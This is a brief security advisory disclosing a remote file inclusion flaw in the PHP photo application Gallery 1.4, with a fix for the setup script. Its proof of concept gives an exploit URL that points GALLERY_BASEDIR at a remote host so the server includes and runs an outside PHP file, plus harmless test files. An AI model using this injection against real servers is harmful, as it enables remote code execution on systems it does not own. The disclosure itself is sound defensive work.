Gallery 1.4 including file vulnerability

[Peter "Stöckli" <pcs@rootquest.com>]

Gallery 1.4 including file vulnerability

-Background Information-
Gallery is a Web-based software product that lets you manage photos on any Web 
site that offers PHP support. With Gallery you can easily create and maintain 
albums of photos via an intuitive interface. Photo management includes 
automatic thumbnail creation, image resizing, rotation, ordering, captioning, 
searching, and more. Albums can have read, write, and caption permissions per 
individual authenticated user for an additional level of privacy. Gallery is 
installed on maybe 20000 Locations.

-Proof of concept-
It is possible to include any php file from a remote host, and execute it on 
the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php"; exists, it will be included. This file 
could look like this if PHP isn't supported on the "tester"-host:

<?php echo "Vulnerable"; ?>

or like this, if PHP is supported on the "tester"-host:

<?php
echo "<?php die(\"Vulnerable\"); ?>";
?>

-Solution-
Change the following Lines in the index.php files in the setup folder:

if (!isset($GALLERY_BASEDIR)) {
        $GALLERY_BASEDIR = '../';
}

to this:

        $GALLERY_BASEDIR = '../';

-Related URLs-
http://gallery.sourceforge.net/
https://sourceforge.net/projects/gallery/

Peter Stöckli
RQ Labs
Rootquest
Switzerland